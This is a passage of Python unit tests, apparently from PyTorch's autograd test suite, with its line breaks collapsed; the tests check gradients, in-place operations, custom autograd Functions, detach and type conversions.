test_inplace(self): x = torch.ones(5, 5, requires_grad=True) y = Variable(torch.ones(5, 5) * 4, requires_grad=True) z = x * y q = z + y w = z * y z.add_(2) # Add doesn't need it's inputs to do backward, so it shouldn't raise q.backward(torch.ones(5, 5), retain_graph=True) # Mul saves both inputs in forward, so it should raise self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5))) z = x * y q = z * y r = z + y w = z.add_(y) # w is a the last expression, so this should succeed w.backward(torch.ones(5, 5), retain_graph=True) # r doesn't use the modified value in backward, so it should succeed r.backward(torch.ones(5, 5), retain_graph=True) # q uses 
dirty z, so it should raise self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5))) with torch.no_grad(): x.grad.zero_() m = x / 2 z = m + y / 8 q = z * y r = z + y prev_version = z._version w = z.exp_() self.assertNotEqual(z._version, prev_version) r.backward(torch.ones(5, 5), retain_graph=True) self.assertEqual(x.grad, torch.ones(5, 5) / 2) w.backward(torch.ones(5, 5), retain_graph=True) self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2)) self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5))) leaf = torch.ones(5, 5, requires_grad=True) x = leaf.clone() x.add_(10) self.assertEqual(x, torch.ones(5, 5) * 11) # x should be still usable y = x + 2 y.backward(torch.ones(5, 5)) self.assertEqual(leaf.grad, torch.ones(5, 5)) z = x * y x.add_(2) self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5))) def test_mark_non_differentiable(self): class MyFunction(Function): @staticmethod def forward(ctx, input): output = input > 0 ctx.mark_non_differentiable(output) return output @staticmethod def backward(ctx, grad_output): return (grad_output * 0).to(torch.double) x = torch.randn(5, 5, requires_grad=True) mask = MyFunction.apply(x) self.assertFalse(mask.requires_grad) y = x.masked_fill(mask, 0) y.sum().backward() def test_mark_non_differentiable_mixed(self): class MyFunction(Function): @staticmethod def forward(ctx, input): a = input + 1 b = input + 2 ctx.mark_non_differentiable(a) return a, b @staticmethod def backward(ctx, grad_a, grad_b): self.assertTrue((grad_a == 0).all()) self.assertTrue((grad_b == 1).all()) return grad_b x = torch.randn(5, 5, requires_grad=True) a, b = MyFunction.apply(x) self.assertFalse(a.requires_grad) self.assertTrue(b.requires_grad) b.sum().backward() self.assertEqual(x.grad, torch.ones(5, 5)) def test_mark_non_differentiable_none(self): # This used to segfault because MyFunction would send back null # gradients to MulBackward, which is implemented in C++. C++ # implemented functions expect incoming grad_ouptuts to be non-null. 
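        # --- Illustrative sketch (hypothetical helper, added for exposition).
        # The tests above use ctx.mark_non_differentiable() to declare that an
        # output (for example a boolean mask) carries no gradient while the
        # rest of the graph stays differentiable. A compact standalone version:
        def _sketch_mark_non_differentiable():
            import torch

            class GreaterThanZero(torch.autograd.Function):
                @staticmethod
                def forward(ctx, inp):
                    out = inp > 0                      # boolean mask
                    ctx.mark_non_differentiable(out)   # masks carry no grad
                    return out

                @staticmethod
                def backward(ctx, grad_output):
                    return None

            x = torch.randn(4, requires_grad=True)
            mask = GreaterThanZero.apply(x)
            assert not mask.requires_grad
            y = x.masked_fill(mask, 0.)                # mask is still usable
            y.sum().backward()
            assert torch.equal(x.grad, (~mask).float())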
class MyFunction(Function): @staticmethod def forward(ctx, input): output = input.clone() ctx.mark_non_differentiable(output) return output @staticmethod def backward(ctx, grad_output): return None x = torch.randn(5, 5, requires_grad=True) r = MyFunction.apply(x * x) (r * x).sum().backward() def test_return_duplicate(self): class DoubleDuplicate(Function): @staticmethod def forward(ctx, x): output = x * 2 return output, output @staticmethod def backward(ctx, grad1, grad2): return grad1 * 2 + grad2 * 2 def fn(x): a, b = DoubleDuplicate.apply(x) self.assertIs(a, b) return a + b x = torch.randn(5, 5, dtype=torch.double, requires_grad=True) gradcheck(fn, [x]) gradgradcheck(fn, [x]) def test_return_duplicate_inplace(self): class DoubleInplace(Function): @staticmethod def forward(ctx, x): x.mul_(2) ctx.mark_dirty(x) return x, x @staticmethod def backward(ctx, grad1, grad2): return grad1 * 2 + grad2 * 2 def inplace_fn(x): a, b = DoubleInplace.apply(x.clone()) self.assertIs(a, b) return a + b x = torch.randn(5, 5, dtype=torch.double, requires_grad=True) gradcheck(inplace_fn, [x]) gradgradcheck(inplace_fn, [x]) # Can't modify leaf variables in-place self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x)) # Functions which modify views in-place must return only one output self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0])) @suppress_warnings def test_resize(self): x = torch.ones(2, 3) self.assertTrue(x.resize(3, 2).size() == (3, 2)) def _test_setitem(self, size, index): x = torch.ones(*size, requires_grad=True) y = x + 2 y_version = y._version y[index] = 2 self.assertNotEqual(y._version, y_version) y.backward(torch.ones(*size)) expected_grad = torch.ones(*size) expected_grad[index] = 0 self.assertEqual(x.grad, expected_grad) def _test_setitem_tensor(self, size, index): x = torch.ones(*size, requires_grad=True) y = x + 2 y_version = y._version value = x.new(x[index].size()).fill_(7) value.requires_grad = True y[index] = value self.assertNotEqual(y._version, y_version) y.backward(torch.ones(*size)) expected_grad_input = torch.ones(*size) expected_grad_input[index] = 0 self.assertEqual(x.grad, expected_grad_input) self.assertEqual(value.grad, torch.ones_like(value)) # case when x broadcasts to as y[1] x = torch.randn(4, requires_grad=True) y = torch.zeros(2, 3, 4) y[1] = x y.backward(torch.randn(2, 3, 4)) self.assertEqual(x.size(), x.grad.size()) def test_setitem(self): self._test_setitem((5, 5), 1) self._test_setitem((5,), 1) self._test_setitem((1,), 0) self._test_setitem((10,), [[0, 4, 2]]) self._test_setitem((5, 5), [[0, 4], [2, 2]]) self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]]) self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)]) self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)]) self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]]) self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)]) self._test_setitem_tensor((5, 5), 3) self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]]) self._test_setitem_tensor((5,), 3) self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum()) self._test_setitem_tensor((5,), [[0, 1, 2, 3]]) self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]]) self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)]) self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)]) self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]]) self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)]) 
self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1, 3]), requires_grad=False), [2, 4], slice(None)]) def test_setitem_mask(self): mask = torch.BoolTensor(5, 5).bernoulli_() self._test_setitem((5, 5), Variable(mask)) self._test_setitem((5,), Variable(mask[0])) self._test_setitem((1,), Variable(mask[0, 0:1])) self._test_setitem_tensor((5, 5), Variable(mask)) self._test_setitem_tensor((5,), Variable(mask[0])) def test_select_sum(self): # both select and sum return Scalars in ATen; ensure they work together. x = torch.randn(10, dtype=torch.double, requires_grad=True) def func(x): return x.select(0, 1).sum() gradcheck(func, [x]) gradgradcheck(func, [x]) def test_diagonal_expanded_v(self): value = torch.rand([]) v_expanded = torch.tensor(value).expand(10) a = torch.rand(10, 10, dtype=torch.double, requires_grad=True) result, = torch.autograd.grad(a.diagonal(), a, v_expanded) self.assertEqual(result, torch.eye(10, dtype=torch.double) * value) def test_select_expanded_v(self): v_expanded = torch.rand(10).expand(10, 10) a = torch.rand(10, 10, 10, requires_grad=True) result, = torch.autograd.grad(a[0], a, v_expanded) expected = torch.zeros(10, 10, 10) expected[0] = v_expanded self.assertEqual(result, expected) def test_slice_expanded_v(self): v_expanded = torch.rand(10, 1).expand(2, 10, 10) a = torch.rand(10, 10, 10, requires_grad=True) result, = torch.autograd.grad(a[3:5], a, v_expanded) expected = torch.zeros(10, 10, 10) expected[3:5] = v_expanded self.assertEqual(result, expected) def test_unbind(self): stacked = torch.randn(3, 10, 10, requires_grad=True) x, y, z = stacked.unbind() grad = torch.randn(3, 10, 10) torch.autograd.backward([x, y, z], grad.unbind()) self.assertEqual(stacked.grad, grad) # check that it works with only one gradient provided (#9977) for i in range(3): stacked = torch.randn(3, 10, 10, requires_grad=True) outs = stacked.unbind() gi = grad.unbind()[i] g, = torch.autograd.grad(outs[i], stacked, gi) g_expected = torch.stack([gi if j == i else torch.zeros_like(gi) for j in range(3)], dim=0) self.assertEqual(g, g_expected) def test_fill(self): root = torch.randn(4, 5, requires_grad=True) def func(root): x = root.clone() x.fill_(2) return x gradcheck(func, [root]) gradgradcheck(func, [root]) def test_unused_output(self): x = torch.randn(10, 10, requires_grad=True) outputs = x.chunk(5) o = outputs[2] o = o * 4 + 2 o.sum().backward() expected_grad = torch.zeros(10, 10) expected_grad[4:6] = 4 self.assertEqual(x.grad, expected_grad) with torch.no_grad(): x.grad.zero_() grad_output = torch.randn(2, 10) outputs = x.chunk(5) outputs[0].backward(grad_output) expected_grad = torch.zeros(10, 10) expected_grad[:2] = grad_output self.assertEqual(x.grad, expected_grad) def _test_sparse_gather(self, size_x, size_ind, dim): x = torch.randn(size_x, requires_grad=True) if len(size_ind) > 0 and len(size_x) > 0: ind = torch.randint(x.size(dim), size_ind) else: ind = torch.zeros(size_ind, dtype=torch.int64) out = torch.gather(x, dim, ind, sparse_grad=False) grad = torch.rand_like(out) out.backward(grad) grad_dense = x.grad.clone() x.grad = None out = torch.gather(x, dim, ind, sparse_grad=True) out.backward(grad) self.assertEqual(grad_dense, x.grad.to_dense()) def test_sparse_gather_dim0(self): self._test_sparse_gather((10, 10), (5, 10), 0) def test_sparse_gather_dim1(self): self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1) def test_sparse_gather_dim_neg(self): self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1) def test_sparse_gather_ind_scalar(self): 
self._test_sparse_gather((10,), (), 0) def test_sparse_gather_x_scalar(self): self._test_sparse_gather((), (2,), 0) def test_sparse_gather_both_scalar(self): self._test_sparse_gather((), (), 0) def test_gc_in_destructor(self): """ Previously, if a Function destructor triggered a garbage collection, the Variable's tp_dealloc handler would get called twice leading to a segfault. """ class CollectOnDelete(Function): def forward(self, x): return x def backward(self, grad_output): return grad_output def __del__(self): gc.collect() for _ in range(10): CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward() def test_naughty_autograd_function_attribute_access(self): class Id(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, grad_x): return grad_x with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"): f = Id() # # After raising warning, should still return an instance self.assertIsInstance(f, Id) x = torch.zeros(1, requires_grad=True) with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"): f(x) t = Id.apply(x) self.assertEqual(t.grad_fn.name(), "IdBackward") # THPFunction is the base class of both grad_fn and autograd functions, # which means that a lot of accessors on them may segfault. Test that we # properly error in this case. t = torch.ones(1, requires_grad=True) t._backward_hooks = dict() with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"): f._register_hook_dict(t) with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"): f.register_hook(lambda x, y: None) with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"): f.next_functions with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"): f.name() with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"): f.metadata @unittest.expectedFailure def test_naughty_anomaly_access(self): class MyFunction(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, g): return g x = torch.zeros(1, requires_grad=True) y = MyFunction.apply(x) y.backward() y.grad_fn.metadata g = y.grad_fn del y g.metadata # this currently fails, but shouldn't def test_naughty_autograd_function_stashing_ctx(self): saved_ctx = [] class Id(Function): @staticmethod def forward(ctx, x): ctx.save_for_backward(x) return x @staticmethod def backward(ctx, grad_x): saved_ctx.append(ctx) return ctx.saved_tensors p = torch.zeros(1, requires_grad=True) loss = Id.apply(p) loss.backward(retain_graph=True) del loss # At this point in time, it complains that the graph has been freed # (which indeed true, although a somewhat indirect way of stating the # problem). self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors) def test_custom_autograd_repeated_grad_grad(self): # This test failed the equality check in PR #22983; it's an interesting # and different test case worth enshrining. mult1 is not testing # anything that interesting, but mult2 is the interesting case. 
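        # --- Illustrative sketch (hypothetical helper, added for exposition).
        # The custom-Function tests below express backward() in terms of
        # differentiable tensor ops on saved tensors so that grad-of-grad
        # works. A minimal version of that recipe, checked with gradcheck:
        def _sketch_custom_function_double_backward():
            import torch
            from torch.autograd import gradcheck, gradgradcheck

            class Square(torch.autograd.Function):
                @staticmethod
                def forward(ctx, x):
                    ctx.save_for_backward(x)
                    return x * x

                @staticmethod
                def backward(ctx, grad_output):
                    x, = ctx.saved_tensors
                    return 2 * x * grad_output   # differentiable ops only

            x = torch.randn(3, dtype=torch.double, requires_grad=True)
            assert gradcheck(Square.apply, (x,))
            assert gradgradcheck(Square.apply, (x,))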
def mult1(x): return x.prod(dim=-1).prod(dim=-1) class Mult(torch.autograd.Function): @staticmethod def forward(ctx, x): y = mult1(x) ctx.save_for_backward(x, y) return y @staticmethod def backward(ctx, grad_output): x, y = ctx.saved_tensors return (grad_output * y)[:, None, None] / x mult2 = Mult.apply def check_gradgrad_repeated(x, y): gy, = torch.autograd.grad(y[0], x, create_graph=True) ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True) gy, = torch.autograd.grad(y[0], x, create_graph=True) ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True) self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1]) x = torch.ones(2, 4, 4).requires_grad_() check_gradgrad_repeated(x, mult1(x)) check_gradgrad_repeated(x, mult2(x)) def test_custom_autograd_no_early_free(self): # This test failed complaining that buffers had already been freed # prior to #22983. Also pretty interesting test case. class Double(torch.autograd.Function): @staticmethod def forward(ctx, x): y = x ** 2 ctx.save_for_backward(x, y) return y @staticmethod def backward(ctx, grad_output): x, _ = ctx.saved_tensors return grad_output * 2 * x # this is equivalent, but uses the output of .forward() in .backward() class Double2(Double): @staticmethod def backward(ctx, grad_output): x, y = ctx.saved_tensors return grad_output * 2 * y / x double = Double.apply double2 = Double2.apply x = torch.tensor(2).double().requires_grad_() self.assertTrue(gradcheck(double, x)) self.assertTrue(gradgradcheck(double, x)) self.assertTrue(gradcheck(double2, x)) self.assertTrue(gradgradcheck(double2, x)) y = double(x) torch.autograd.grad(y, x, create_graph=True) torch.autograd.grad(y, x) y = double2(x) torch.autograd.grad(y, x, create_graph=True) torch.autograd.grad(y, x) # should not error! def test_detach(self): x = torch.randn(10, 10, requires_grad=True) y = x + 2 y = y.detach() z = y * 4 + 2 self.assertFalse(y.requires_grad) self.assertFalse(z.requires_grad) x = torch.randn(10, 10, requires_grad=True) y = x * 2 y = y.detach() self.assertFalse(y.requires_grad) self.assertIsNone(y.grad_fn) z = x + y z.sum().backward() # This is an incorrect gradient, but we assume that's what the user # wanted. detach() is an advanced option. 
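        # --- Illustrative sketch (hypothetical helper, added for exposition).
        # As the comment above says, detach() deliberately cuts the graph, so
        # only the non-detached path contributes to the gradient:
        def _sketch_detach_blocks_gradient():
            import torch
            x = torch.randn(3, requires_grad=True)
            y = (x * 2).detach()     # a constant from autograd's point of view
            z = x + y
            z.sum().backward()
            assert torch.equal(x.grad, torch.ones(3))   # only the direct path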
self.assertEqual(x.grad, torch.ones(10, 10)) # in-place detach x = torch.randn(10, 10, requires_grad=True) y = torch.randn(10, 10, requires_grad=True) a = x * 2 (y + a).sum().backward(retain_graph=True) a.detach_() self.assertFalse(a.requires_grad) (y + a).sum().backward() # this won't backprop to x self.assertEqual(x.grad, torch.ones(10, 10) * 2) self.assertEqual(y.grad, torch.ones(10, 10) * 2) # in-place deatch on a view raises an exception view = x.narrow(0, 1, 4) self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_()) def test_detach_base(self): "detaching base does not detach view" x = torch.randn(10, 10, requires_grad=True) view = x.narrow(0, 1, 4) x.detach_() self.assertFalse(x.requires_grad) self.assertTrue(view.requires_grad) self.assertIsNotNone(view.grad_fn) self.assertIs(view._base, x) def _test_type_conversion_backward(self, t, ): fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True) fvar.double().sum().backward() self.assertEqual(fvar.grad, torch.ones_like(fvar)) self.assertEqual(type(fvar.grad), type(fvar)) dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True) dvar.float().sum().backward() self.assertEqual(dvar.grad, torch.ones_like(dvar)) self.assertEqual(type(dvar.grad), type(dvar)) def test_type_conversions(self): x = torch.randn(5, 5) self.assertIsInstance(x.float(), torch.FloatTensor) self.assertIsInstance(x.int(), torch.IntTensor) if torch.cuda.is_available(): self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor) self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor) self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor) if torch.cuda.device_count() >= 2: x2 = x.float().cuda(1) self.assertIsInstance(x2, torch.cuda.FloatTensor) self.assertIs(x2.get_device(), 1) x2 = x.float().cuda() self.assertIsInstance(x2, torch.cuda.FloatTensor) self.assertIs(x2.get_device(), 0) x2 = x2.cuda(1) self.assertIsInstance(x2, torch.cuda.FloatTensor) self.assertIs(x2.get_device(), 1) y = Variable(torch.randn(5).cuda(1), requires_grad=True) y.cpu().sum().backward() self.assertIs(y.grad.get_device(), 1) self.assertIs(y.long().get_device(), 1) for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]: for y_var in (True, False): y = torch.randint(5, (5, 5), dtype=t.dtype) y = Variable(y) if y_var else y self.assertIsInstance(x.type(t), t) self.assertIsInstance(x.type_as(y), t) # TODO: t.dtype should work t_dtype = t().dtype self.assertIsInstance(x.type(t_dtype), t) self.assertIs(t_dtype, x.type(t_dtype).dtype) self.assertEqual(y.data_ptr(), y.type(t).data_ptr()) if torch.cuda.is_available(): for x_cuda in (True, False): for y_cuda in (True, False): x_c = x.cuda() if x_cuda else x y_c = y.cuda() if y_cuda else y _, y_type = y_c.type().rsplit('.', 1) y_typestr = ('torch.cuda.' 
if y_cuda else 'torch.') + y_type self.assertEqual(y_c.type(), x_c.type(y_typestr).type()) self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype) self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr()) self._test_type_conversion_backward(lambda x: x) if torch.cuda.is_available(): self._test_type_conversion_backward(lambda x: x.cuda()) if torch.cuda.device_count() >= 2: # one of these has to be the non-default device self._test_type_conversion_backward(lambda x: x.cuda(0)) self._test_type_conversion_backward(lambda x: x.cuda(1)) def test_isolated_node(self): x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5, 5, requires_grad=True) a = x + y b = torch.max(a, 1, True)[1].repeat(1, 5).double() o = (b + a).sum() o.backward() def test_shape(self): x = torch.randn(3, 4) self.assertEqual(2, len(x.shape)) self.assertEqual(x.shape[0], 3) self.assertEqual(x.shape[1], 4) def test_numpy_requires_grad(self): x = torch.randn(2, 2, requires_grad=True) err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead." with self.assertRaisesRegex(RuntimeError, err_msg_outputs): x.numpy() with torch.no_grad(): x.numpy() x = torch.randn(2, 2) x.numpy() with torch.no_grad(): x.numpy() def test_return_leaf(self): class Identity(Function): @staticmethod def forward(ctx, a, b): return a, a + b @staticmethod def backward(ctx, grad_a, grad_b): return grad_a + grad_b, grad_b hook_called = [False] x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5, 5, requires_grad=True) q, p = Identity.apply(x, y) # Make sure hooks only receive grad from usage of q, not x. def hook(grad): hook_called[0] = True self.assertEqual(grad, torch.ones(5, 5)) q.register_hook(hook) (q + p + x).sum().backward() self.assertEqual(x.grad, torch.ones(5, 5) * 3) self.assertEqual(y.grad, torch.ones(5, 5)) self.assertTrue(hook_called[0]) def test_return_leaf_inplace(self): class Inplace(InplaceFunction): @staticmethod def forward(ctx, a, b): ctx.mark_dirty(a) return a.add_(b), b + 2 @staticmethod def backward(ctx, grad_a, grad_b): return grad_a, grad_a + grad_b x = torch.randn(5, 5) y = torch.randn(5, 5, requires_grad=True) q, p = Inplace.apply(x, y) self.assertIs(q, x) self.assertIs(q.grad_fn.__class__, Inplace._backward_cls) self.assertTrue(q.requires_grad) q.sum().backward() self.assertEqual(y.grad, torch.ones(5, 5)) def test_leaf_assignment(self): x = torch.randn(5, 5) y = torch.randn(5, requires_grad=True) z = torch.randn(5, requires_grad=True) x[0] = y x[1] = 2 * z self.assertTrue(x.requires_grad) self.assertIsNot(x.grad_fn, None) x.sum().backward() self.assertEqual(y.grad, torch.ones(5)) self.assertEqual(z.grad, torch.ones(5) * 2) def test_no_grad_assignment(self): x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5) with torch.no_grad(): x[0] = y self.assertTrue(x.requires_grad) self.assertIsNone(x.grad_fn) def test_no_grad_modifies_version(self): x = torch.randn(5, requires_grad=True) y = torch.randn(5, requires_grad=True) z = (x * y).sum() with torch.no_grad(): x *= 2 self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation', lambda: z.backward()) def test_no_grad_input(self): class MyFunction(Function): @staticmethod def forward(self, x): return x @staticmethod def backward(self, grad_output): return grad_output x = torch.randn(5, requires_grad=True) with torch.no_grad(): y = MyFunction.apply(x) self.assertTrue(x.requires_grad) self.assertIsNone(y.grad_fn) def test_backward_copy(self): # This tests checks backward engine for a 
very subtle bug that appreared # in one of the initial versions of autograd. Gradients tensors were # simply stored in lists while the function waited for all its gradients # to be computed. However, sometimes an output was used multiple times, # so the gradients needed to be summed. Engine used to keep a need_copy # set of tensors that will need a clone upon next addition and removed # them from the set as soon as the clone was performed. However, this # could lead to incorrect results if the same gradient tensor was # buffered in three places in the graph: # 1. When accumulating gradients in one of these places it was cloned # and removed from need_copy set. # 2. When accumulating in second place, it wasn't in the need_copy set, # so the gradients were simply accumulated in-place (which already # modified the grad in 3rd place) # 3. When accumulating in the third place, it wasn't in the need_copy set # as well, so the incoming gradient was summed in-place, yielding # incorrect results in all functions, except the first one. x = torch.ones(5, 5, requires_grad=True) y = torch.ones(5, 5, requires_grad=True) # Simulate that we're in the middle of the graph a = x + 2 b = y + 2 c = x + 2 # This op will just return grad_output two times in backward add1 = a + b add2 = add1 + c # Simulate a long branch, so grad_output will get buffered. for _ in range(4): a = a * 2 b = b * 2 c = c * 2 branch = a + b + c out = add2 + branch # expected gradients are: # for x: 34 (16 from final a, 16 from final c, 2 from add2) # for y: 17 (16 from final b, 1 from add2) grad_output = torch.ones(5, 5) out.backward(grad_output) self.assertEqual(x.grad, torch.ones(5, 5) * 34) self.assertEqual(y.grad, torch.ones(5, 5) * 17) def test_save_none_for_backward(self): test_case = self class MyFn(Function): @staticmethod def forward(ctx, input): ctx.save_for_backward(None, input, None) return input * input @staticmethod def backward(ctx, grad_output): n1, input, n2 = ctx.saved_tensors test_case.assertIsNone(n1) test_case.assertIsNone(n2) return 2 * input * grad_output x = torch.randn(5, 5, requires_grad=True) y = MyFn.apply(x) y.sum().backward() self.assertEqual(x.grad, 2 * x) def test_too_many_grads(self): class MyFn(Function): @staticmethod def forward(ctx, input): return input @staticmethod def backward(ctx, grad_output): return grad_output, None, None x = torch.randn(5, 5, requires_grad=True) y = MyFn.apply(x) y.sum().backward() self.assertEqual(x.grad, torch.ones_like(x)) def test_pickle(self): x = torch.randn(10, 10, requires_grad=True) y = torch.randn(10, 10, requires_grad=False) def assert_strict_equal(var1, var2): self.assertEqual(var1, var2) self.assertEqual(var1.requires_grad, var2.requires_grad) serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)] for dump in serialized: xc, yc = pickle.loads(dump) assert_strict_equal(xc, x) assert_strict_equal(yc, y) def test_dep_nograd(self): class F1(Function): @staticmethod def forward(ctx, input): out = torch.randn(input.size()) ctx.mark_non_differentiable(out) return input, out @staticmethod def backward(ctx, grad_output, ignored): return grad_output class F2(Function): @staticmethod def forward(ctx, input, ignored): return input @staticmethod def backward(ctx, grad_output): return grad_output, None x = torch.randn(5, requires_grad=True) a, b = F1.apply(x) b = b + 1 # separate F1 from F2 by another op self.assertTrue(a.requires_grad) self.assertFalse(b.requires_grad) c = F2.apply(a, b) c.backward(torch.ones(c.size())) self.assertEqual(x.grad, 
torch.ones(x.size())) def test_set_grad_enabled(self): x = torch.tensor([1.], requires_grad=True) with torch.set_grad_enabled(False): y = x * 2 self.assertFalse(y.requires_grad) with torch.set_grad_enabled(True): y = x * 2 self.assertTrue(y.requires_grad) with torch.set_grad_enabled(False): torch.set_grad_enabled(True) y = x * 2 self.assertTrue(y.requires_grad) def test_simple_reentrant(self): y_data = torch.randn(2, 2) class Reenter(Function): @staticmethod def forward(ctx, x): with torch.enable_grad(): ctx.x = Variable(x, requires_grad=True) ctx.y = Variable(y_data, requires_grad=True) ctx.output_var = ctx.x * ctx.y return ctx.output_var.detach() @staticmethod def backward(ctx, grad_output): with torch.enable_grad(): ctx.output_var.sum().backward() return ctx.x.grad * grad_output # Reentrant starts on CPU thread, finishs on GPU thread x = torch.randn(2, 2, requires_grad=True) out = Reenter.apply(x) out.sum().backward() self.assertEqual(x.grad, y_data) def test_reentrant_child_error(self): # Parent graph. a = torch.rand(3, 3, requires_grad=True) c = a * a # Reentrant child graph. b = torch.rand(3, 3, requires_grad=True) e = b * b f = TestAutograd.SimulateBackwardError.apply(e) reentrant_root = f.sum() class ReentrantFunc(Function): @staticmethod def forward(ctx, inp): return inp.clone() @staticmethod def backward(ctx, grad): # Reentrant backward in child will throw an error. reentrant_root.backward() return grad d = ReentrantFunc.apply(c) with self.assertRaisesRegex(Exception, 'Simulate error'): d.sum().backward() def test_broadcast_tensors(self): f_args_variable = (torch.randn(3, dtype=torch.double, requires_grad=True), torch.randn(1, 2, 1, dtype=torch.double, requires_grad=True), torch.randn(1, 1, dtype=torch.double, requires_grad=True), torch.randn(5, 1, 1, dtype=torch.double, requires_grad=True)) f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_broadcast_tensors", "broadcast", lambda a, b, c, d: torch.broadcast_tensors(a, b, c, d), True, f_args_variable, f_args_tensor) def test_block_diag(self): f_args_variable = (torch.randn(1, S, dtype=torch.double, requires_grad=True), torch.randn(2, S, dtype=torch.double, requires_grad=True), torch.randn(3, S, dtype=torch.double, requires_grad=True)) f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_block_diag", "block_diag", lambda a, b, c: torch.block_diag(a, b, c), True, f_args_variable, f_args_tensor) def test_cat(self): f_args_variable = (torch.randn(1, S, S, dtype=torch.double, requires_grad=True), torch.randn(2, S, S, dtype=torch.double, requires_grad=True), torch.randn(3, S, S, dtype=torch.double, requires_grad=True), 0) f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_cat", "cat", lambda a, b, c, dim: torch.cat((a, b, c), dim), True, f_args_variable, f_args_tensor) def test_cat_negdim_1(self): f_args_variable = (torch.randn(S, S, 1, dtype=torch.double, requires_grad=True), torch.randn(S, S, 2, dtype=torch.double, requires_grad=True), torch.randn(S, S, 3, dtype=torch.double, requires_grad=True), -1) f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_cat_negdim_1", "cat", lambda a, b, c, dim: torch.cat((a, b, c), dim), True, f_args_variable, f_args_tensor) def test_cat_negdim_2(self): f_args_variable = (torch.randn(S, 1, S, dtype=torch.double, requires_grad=True), torch.randn(S, 2, S, dtype=torch.double, requires_grad=True), torch.randn(S, 3, S, dtype=torch.double, 
requires_grad=True), -2) f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_cat_negdim_2", "cat", lambda a, b, c, dim: torch.cat((a, b, c), dim), True, f_args_variable, f_args_tensor) def test_cat_empty_legacy(self): f_args_variable = (torch.randn(0, dtype=torch.double, requires_grad=True), torch.randn(S, S, dtype=torch.double, requires_grad=True)) # gradgradcheck doesn't work, probably because legacy size tracking is wrong somewhere, # hence False passed below, but gradcheck checked explicitly. f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_cat_empty_legacy", "cat", lambda a, b: torch.cat((a, b)), False, f_args_variable, f_args_tensor) self.assertTrue(gradcheck(lambda a, b: torch.cat((a, b)), f_args_variable, eps=1e-6, atol=PRECISION)) def test_cat_empty(self): f_args_variable = (torch.randn(0, S, dtype=torch.double, requires_grad=True), torch.randn(S, S, dtype=torch.double, requires_grad=True)) f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_cat_empty", "cat", lambda a, b: torch.cat((a, b)), True, f_args_variable, f_args_tensor) def test_trapz(self): f_args_variable = (torch.randn(2, 3, dtype=torch.double, requires_grad=True), torch.tensor([[1.0, 2.0, 5.5], [2.3, 0.5, 6.2]], dtype=torch.double, requires_grad=True)) f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_trapz", "trapz", lambda y, x: torch.trapz(y, x), True, f_args_variable, f_args_tensor) def test_var_mean_differentiable(self): dim = [2, 4] keepdim = False input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True) input2 = deepcopy(input1) var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim) var2 = input2.var(dim=dim, keepdim=keepdim) mean2 = input2.mean(dim=dim, keepdim=keepdim) grad = 